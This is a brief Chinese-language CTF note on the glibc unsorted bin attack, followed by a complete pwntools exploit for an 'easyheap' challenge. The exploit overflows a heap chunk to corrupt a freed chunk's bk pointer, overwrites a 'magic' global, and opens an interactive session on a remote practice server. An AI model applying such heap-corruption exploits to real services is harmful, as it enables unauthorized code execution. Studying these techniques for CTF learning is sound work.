unsortbin attack

 

 Unsorted Bin 双向循环链表,先进先出

如果unsorted bin中只有一个chunk的话，chunk的fd、bk指针都指向main_arena+偏移：

https://mp.weixin.qq.com/s/1KhiulR-webHsBZhUzQzKg

https://blog.csdn.net/qq_36495104/article/details/106246762

from pwn import *
import sys
import time


#context.log_level='debug'

#p=process("./easyheap")
p=remote("redirect.do-not-trust.hacking.run",10413)
e=ELF("./easyheap")

#context.terminal=["gnome-terminal","-x","sh","-c"]
#gdb.attach(p)

def create(size,content):
	p.sendlineafter("Your choice :","1")
	p.sendlineafter("Size of Heap : ",str(size))
	p.sendlineafter("Content of heap:",content)

def edit(index,size,content):
	p.sendlineafter("Your choice :","2")
	p.sendlineafter("Index :",str(index))
	p.sendlineafter("Size of Heap : ",str(size))
	p.sendlineafter("Content of heap : ",content)


def delete(index):
	p.sendlineafter("Your choice :","3")
	p.sendlineafter("Index :",str(index))

fd=0
magic=0x6020c0

#start to attack
create(0x10,"a"*0x10)
create(0x80,"b"*0x80)
create(0x80,"c"*0x80)

delete(1)
payload="d"*0x18+p64(0x91)+p64(fd)+p64(magic-0x10)
edit(0,0x30,payload)
create(0x80,"aaa")

p.sendlineafter(":",str(4869))
p.interactive()